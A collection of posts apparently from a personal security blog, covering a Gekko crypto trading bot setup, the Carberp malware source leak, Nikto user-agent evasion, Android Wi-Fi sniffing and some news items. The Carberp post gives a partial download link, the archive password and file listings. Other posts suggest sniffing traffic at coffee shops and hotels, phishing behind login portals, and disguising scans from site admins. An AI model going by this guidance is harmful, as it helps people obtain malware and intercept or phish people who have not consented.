Reference for the Python injection attack used to gain initial foothold.

Reference used to get proper syntax for our initial foothold.

Reference for identifying docker instances.

How to know you are inside a Docker container

Reference for the changes to the script.

Reference for Vault commands used.

If you enjoyed the challenge give some respect to the creator rotarydrone

Not a Reference but Just a Super Cool Tool to Use with HTB Labs

In this article we will cover how to quickly setup a trading bot for crypto-currencies. As the difficulty for BTC continues to rise the profit in mining coins continues to drop. A good method to make up those losses is with a trading bot which will work to increase your profit margin by making the moves needed on the market while you are away.

For this we will use the following tools:

  • Turnkey Linux NODE.js VM
  • Gekko Trading Bot
  • Mt.Gox or BTCe account (w/ funds)

Setting up the Environment

First we will download the following Linux VM image

(alternately you can just run the bot directly by downloading & installing

For step by step instructions for a Windows based install refer to this:

After downloading and booting the Linux VM image we prepare the host. After initial boot we choose the “Quit” option from the menu to get to a shell.

Once there:

apt-get install byobu
adduser coinmaker

(assign some strong passwords if required setup SSH keys)

git clone /opt/gekko
chown -R coinmaker /opt/gekko
su – coinmaker
cd /opt/gekko/ && npm install

We can now run the bot to verify its functional:

node gekko

We can refer to for a full list of options available for the config.js file. To get going quickly change the following options:

cp config.js config.bkup && vi config.js

  • Change the “exchange” to your preferred trading hub
  • Change the currency setting to match your desired currency
  • If you want to enable trading then add the API key/secret generated by your trading hub for your account
  • Also change the tradingEnabled to true to allow trading.
config.normal = {
  enabled: true,
  exchange: 'MtGox', // 'MtGox', 'BTCe', 'Bitstamp' or 'cexio'
  currency: 'USD',
  asset: 'BTC',
  tradingEnabled: false,
  key: '',
  secret: '',
  username: 0 // only fill this is when using Bitstamp or cexio

Also ensure the “Advanced section” matches the settings in the config.normal section if you enable trading. This would include the Trading Hub set to “true” along with the same API key/secret used.

Now we can launch the bot and monitor its performance and trading from the console

 byobu && node gekko

2013-12-10 18:12:11 (INFO): Profit reporter active on simulated balance
2013-12-10 18:12:11 (INFO): Calculating EMA on historical data…
2013-12-10 18:14:31 (INFO): ADVICE is to BUY @ (

The point is ladies and gentlemen that greed, for lack of a better word, is good.

And that’s it! Take a snapshot of the VM instance and clone away if you need to trade on more than one hub at a time.

Very interesting source code leak today for the Carberp malware family.
This black market malware once being offered for $40k will surely be of interest to anyone who conducts malware & botnet analysis. The leak included a few other tools that helped make it so successful like the bootloader, MC obfuscate, along with various functions taken from other malware source code like Zeus and Spyeye.

Which begs the question, how do we address the leakage and sharing of malware source code in the public domain?

Here is a more detailed story behind the leak:

Here is more info on the information leaked:

Link 1: (as of this posting this link seems dead)
Link 2:!0YsXWBRD!CMqd9nrm1d0XABKlifI9vmxprpQ6RnfsdhBHeKrDXao (This one feels lucky!)

The password is:
Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh

Analysis of the package

Ursnif related

pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\VNCDLL.dll
pro\all source\TZ\vnc\VNCd.7z->VNCd/VNCDLL.dll
pro\source builder plugins inj’s modules etc\WndRec\vncdemo\VNCDLL.dll
pro\source builder plugins inj’s modules etc\Сорцы и Модули\VNCd.7z->VNCd/VNCDLL.dll

Rovnix related (BKLoader itself)

pro\all source\bootkit.old\KLoader\release\i386\kloader.sys
pro\all source\BootkitDropper\nbuild\SrcDir\bksetup.exe
pro\all source\test\bootkit\1\bksetup.exe
pro\all source\test\bootkit\1\setupdll.dll
pro\all source\test\bootkit\bksetup.exe
pro\all source\test\bootkit\setupdll.dll
pro\all source\TZ\bootkit\bin\bksetup.exe
pro\all source\TZ\bootkit\bin\setupdll.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2\biin\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2\bin\release\i386\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2_KIP\BK2.8.2_KIP\biin\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2_KIP\BK2.8.2_KIP\bin\release\i386\SetupDll.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\BkSetup.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\bin\BkSetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\bin\SetupDll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Release\bksetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Release\setupdll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\bin\BkSetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\bin\SetupDll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Release\bksetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Release\setupdll.dll
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Rootkit.7z->DrvTest/debug/DrvTest.sys
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Rootkit.7z->DrvTest/debug/SpoolNetAdvr.sy_
pro\all source\bootkit\bin\Release\i386\kloader.sys
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\driver_i386\kloader.sys
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\driver_i386\kloader.sys
pro\all source\TZ\bootkit\BK\bin\release\i386\kloader.sys
pro\all source\bootkit.old\KLoader\release\amd64\kloader.sys
pro\all source\BootkitDropper\nbuild\SrcDir\BkSetup.dll

Alureon related (dropper of old variants, still ITW)

pro\all source\DropSploit1.rar->DropSploit1\out\builder_Release.exe
pro\all source\DropSploit1.rar->DropSploit1\out\Release\dropper.exe
pro\all source\DropSploit1\out\builder_Release.exe
pro\all source\DropSploit1\out\Release\dropper.exe
pro\all source\DropSploit\out\builder_Release.exe
pro\all source\DropSploit\out\builder_Release.sys
pro\all source\DropSploit\out\dropper.dll
pro\all source\DropSploit\out\Release\dropper.dll
pro\all source\DropSploit\test\1\builder_Release.exe
pro\all source\DropSploit\test\2\builder_Release.exe
pro\all source\DropSploit\test\3\builder_Release.exe
pro\all source\DropSploit\test\5\builder_Release.exe
pro\all source\DropSploit\test\6\builder_Release.exe
pro\all source\DropSploit\test\7\builder_Release.exe
pro\all source\DropSploit\test\8\builder_Release.exe

Claywhist (VNC) related
pro\all source\RemoteCtl\Release\hvnc.exe

Phdet related

pro\all source\TZ\kill_os\bin\os_kill_debug.exe
pro\all source\TZ\kill_os\os_kill_src.7z->os_kill_src/bin/os_kill.exe
pro\all source\TZ\kill_os\os_kill_src.7z->os_kill_src/bin/os_kill_debug.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\os_kill_src.7z->os_kill_src/bin/os_kill.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\os_kill_src.7z->os_kill_src/bin/os_kill_debug.exe

Zeus related

pro\all source\GrabberIE_FF\Release\GrabberIE_FF.dll
pro\all source\temp\zeus src.rar->zeus src\output\builder\zsb.exe
pro\all source\temp\zeus src.rar->zeus src\output\client32.bin
pro\all source\ZeuS\output\builder\zsb.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\zeus2089.7z->zeus2089/output/builder/zsb.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\zeus2089.7z->zeus2089/output/client32.bin

SpyEye related

pro\source builder plugins inj’s modules etc\Сорцы и Модули\>iehookdll_mod.dll
pro\all source\RemoteCtl\Release\rdp.dll
pro\all source\temp\rdp.dll
pro\all source\temp\rdp.exe
pro\all source\TZ\rdp\rdp.plug
pro\source builder plugins inj’s modules etc\plugs\rdp.plug

Vundo related

pro\all source\AgentFullTest.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\BootkitRunBot.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\MiniLoader.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\new.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav2.exe
pro\all source\BJWJ\Builds\Bin\Release\BootkitRunBot.dll
pro\all source\BJWJ\Builds\Bin\Release\MiniLoader.exe
pro\all source\BJWJ\Builds\Bin\Release\new.exe
pro\all source\bootkit\BkBuild\BootkitRunBot.dll
pro\all source\Demo_Cur2\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\keys\Builds\Bin\Debug\RU.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\WhiteJoe.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\WhiteJoe.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\BkInstaller.dll
pro\source builder plugins inj’s modules etc\ConfigBuilder\ConfigBuilder\ConfigBuilder.exe
pro\source builder plugins inj’s modules etc\ConfigBuilder\for test\ConfigBuilder.exe

Carberp itself

pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\BootkitDropper.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\bot.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\disktest.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\FakeDll.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az1.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG1.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG2.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_FDI_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release\bki.plug
pro\all source\BJWJ\Builds\Bin\Release\bktest.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav1.exe
pro\all source\BJWJ\Builds\Bin\Release\bootkit.exe
pro\all source\BJWJ\Builds\Bin\Release\BootkitDropper.exe
pro\all source\BJWJ\Builds\Bin\Release\bot.plug
pro\all source\BJWJ\Builds\Bin\Release\docfind.exe
pro\all source\BJWJ\Builds\Bin\Release\first.plug
pro\all source\BJWJ\Builds\Bin\Release\Full.exe
pro\all source\BJWJ\Builds\Bin\Release\ifobstst.exe
pro\all source\BJWJ\Builds\Bin\Release\livrus.exe
pro\all source\BJWJ\Builds\Bin\Release\Loader_dll.dll
pro\all source\BJWJ\Builds\Bin\Release\mmm.exe
pro\all source\BJWJ\Builds\Bin\Release\mybot.exe
pro\all source\BJWJ\Builds\Bin\Release\mytest.exe
pro\all source\BJWJ\Builds\Bin\Release\ola.exe
pro\all source\BJWJ\Builds\Bin\Release\ola1.exe
pro\all source\BJWJ\Builds\Bin\Release\ola2.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az1.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az_FDI.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az_serg.exe
pro\all source\BJWJ\Builds\Bin\Release\second.plug
pro\all source\BJWJ\Builds\Bin\Release\test.exe
pro\all source\BJWJ\Builds\Bin\Release\testftp.exe
pro\all source\BJWJ\Builds\Bin\Release\testnew.exe
pro\all source\BJWJ\Builds\Bin\Release\testtt.exe
pro\all source\BJWJ\Builds\Bin\Release\tinytst.exe
pro\all source\BJWJ\Builds\Bin\Release\tst.exe
pro\all source\BJWJ\Builds\Bin\Release\vnctest.exe
pro\all source\BJWJ\Builds\Bin\Release\wndrec.exe
pro\all source\BJWJ\Builds\Bin\Release\wndrec2.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoeRebootPing.exe
pro\all source\BootkitDropper\Bin\Release\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\Release\WhiteJoeRebootPing.exe
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoe.exe
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoeRebootPing.exe
pro\all source\Bot Builder\WhiteJoeRebootPing.exe
pro\all source\temp\2012-07-04_FakeDllFiles\bot.plug
pro\all source\temp\marazm\Droper\WhiteJoe.exe
pro\all source\test\test\ola.exe
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\Bot.plug
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\Loader_dll.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\WhiteJoeRebootPing.dll
pro\source builder plugins inj’s modules etc\Full.exe
pro\source builder plugins inj’s modules etc\Full_btc.exe
pro\source builder plugins inj’s modules etc\plugs\bki.plug
pro\source builder plugins inj’s modules etc\plugs\bki_log.plug
pro\source builder plugins inj’s modules etc\plugs\bot.plug
pro\source builder plugins inj’s modules etc\plugs\bot_log.plug
pro\source builder plugins inj’s modules etc\plugs\log\bki.plug
pro\source builder plugins inj’s modules etc\plugs\log\bot.plug
pro\source builder plugins inj’s modules etc\RU_Az_btc.exe
pro\source builder plugins inj’s modules etc\RU_Az_if.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\DBG_bot.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full_SB.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full_SB_hnt.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU.exe
pro\all source\BJWJ\Builds\Bin\Release\mmmm.exe
pro\all source\BJWJ\Builds\Bin\Release\RU.exe
pro\all source\Demo_Cur.rar->Demo_Cur\WhiteJoe\Debug\WhiteJOE_Bank.exe
pro\all source\Demo_Cur2\WhiteJoe\Debug\WhiteJOE_Bank.exe
pro\all source\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\Demo_cur_old.7z->WhiteJoe/Debug/WhiteJOE_Bank.exe
pro\all source\keys\Builds\Bin\Release\RU.exe
pro\source builder plugins inj’s modules etc\InjTest.exe
pro\all source\BJWJ\Builds\Bin\BootkitTest\Loader_dll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Loader_dll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Loader_dll.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\CoreDll.dll
pro\all source\BootkitDropper\Bin\Debug\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\Debug\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\Bin\Debug\WhiteJoeRebootPing.exe
pro\all source\Demo_Cur.rar->Demo_Cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\Demo_cur_old.7z->WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\Locker\bin\Debug\locker.exe
pro\all source\temp\Demo_cur.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\temp\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\Demo_ifobs.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\dll\iFOBSBal\Demo_iFOBS_src.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\dll\iFOBSBal\WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\iFobsLdr.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\src2\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\WndRec\output\log\IBank\1237\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoe.dll
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\Bin\Release\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoe.dll
pro\all source\bootkit\BkBuild\ping.dll
pro\all source\temp\marazm\Droper\WhiteJoe.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Loader.exe

Stoned framework with Black Hat Europe 2007 Vipin Kumar POC, detected as Sinowal
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Stoned Bootkit

There is also a copy of Win32 Obfuscator known as Mystic Compressor.

adminpanel без иконки\bot_adm\cache\cryptor\CRYPTOR.EXE
pro\all source\BootkitDropper\nbuild\Tools\Mystic.exe
pro\all source\Locker\build\Tools\mystic.exe
pro\all source\test\Mystic.exe
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\Tools\Mystic.exe

Sometimes it really fun to watch people stumble about.
Watching the drunk bloke leave the local pub after way to many.
Seeing as he stumbles about in his drunken dance trying to stay on his feet.
Just before he hits the curb loses his footing and tumbles on his back into the middle of the roadway.

At least that’s what it feels like when you see the constant attempts to run web scanning tools against websites these days.
The scripts and tools have been dumb’d down so much that most people running the tools have no idea what they are doing.

That being said it’s not nearly as much fun if all the players don’t understand the rules to play the game.

So here is your first installment of how to UN-n00B your nikto script.
Since Nikto scans are such a commonly used tool out there it is something more website admin’s will look for and try to prevent.
The easiest way to do this is to just filter for the default Nikto user agent since many n00B’s will not bother to change this value.

Here is what it looks like in the web server logs:
Default User Agent

Pretty easy to see the big “Kick Me” sign there.
So let’s make that look better shall we?
First we need to verify we have a newer version of Nikto (v2+)
./ --Version
Nikto Version Info
(older version’s of Nikto require modification of actual perl modules not covered here)

Next we edit the nikto.conf file (for BT users that’s /pentest/web/nikto/nikto.conf)
We want to change the following value
Nikto Default Agent Value
To something more friendly
Nikto Modified User Agent

Now when we look at the web server logs we see our changes
Nikto New Logs

Sometimes carrying around a laptop to conduct wireless recon can be a pain.
Today I will show how with your rooted Android & a couple free programs from the Android marketplace you can begin doing some real wireless recon.


To start search for and install the following 5 programs.
1) Droidwall
2) WiFi Analyzer
3) Shark for Root
4) Shark Reader
5) Network Discovery

Some other useful tools: ssh client, file manager w/SMB, RDP client, Wireless Tether,
Android Webserver, FTP client & server


Once all programs are installed we setup our Droidwall like so
Droidwall Rule1Droidwall Rule2
Continue doing this for Network Discovery and other programs
you wish to use during your recon fun.


We launch our WiFi Analyzer
WiFi Analyzer Screen
Using the signal strength meter we find a good access point to visit.
Then we launch our Shark to eat up the packets out there.
Eventually we will end up with some data to read.
We can use Shark Reader now or a desktop later to read the data.
Shark Reader 1Shark Reader 2
We can also use our Network Discovery tool to find devices
and services running on the target network.
Network Discovery

Some more advanced techniques using some of the additional tools mentioned above could be to launch phishing attacks in areas requiring users to login thru a web based portal.

When looking for cool spots to capture some traffic try your networks, coffee shops, airports, campuses, hotels, etc…

Freshly back from a new round of security based conferences I will take a moment to point out one of the more interesting topics for me this time around.
The discussion on Cell Phone Spying (not that I made it inside the actual talk with the ungodly line). More specifically how by using a frequency flooding technique on 2G networks its possible to do a MiTM type of ease drop on conversations & data. You can read more about it Here

As mentioned in the article a workaround for this issue would be to disable 2G mode on GSM phones.

Here is the quick and dirty way to do this in Android (tested on rooted phone)
DISCLAIMER: Forcing 3G mode will use more battery life
Also if your not on GSM don’t try this @ home…duh

Open Dialer and Enter: *#*#4636*#*#
After inputing the number you will be prompted with a “Testing” menu
Choose “Phone Information”
Scroll all the way down “Set preferred network type” and change this setting to WCDMA_only
That’s it!

Droid 3G Only Mode

I take no credit for the fix above as it was posted on the android dev forums.
Also this protects you from this exploit and any targeting 2G only, but many other GSM insecurities still exist. Another related topic also discussed was using a TOR client to obfuscate your traffic and make yourself much more anonymous. I will cover this topic a bit more in some upcoming Android based posts.

It was in 2006 that the language known as RUBY was fully accepted as a standard language. The self described “open source programming language with a focus on simplicity and productivity” is one of the more powerful languages in use today. The folks over at Matasano Security (not affiliated with “matz” Y.Matsumoto the creator of RUBY) have announced the release of ‘rbkb’ or The Ruby Black Bag.

‘rbkb’ is an ever growing collection of reversing and pen-testing related ruby libraries and tools I’ve been using and evolving for a long time now.

Head on over to their site to read more.

Those cool guys at Hack-A-Day have a fun article on how to hack your old atari system to make it S-Video compatible thus making it actually usable without that old TV slider switch. I think this will be a good reference to perform a similar hack on my ancient Tandy PC that I really want to see boot up again. Wonder what I can get to run on this old Tandy to make it useful again, and where did I put all those old Floppy disks and program cartridges?

Read More on the S-Video hack here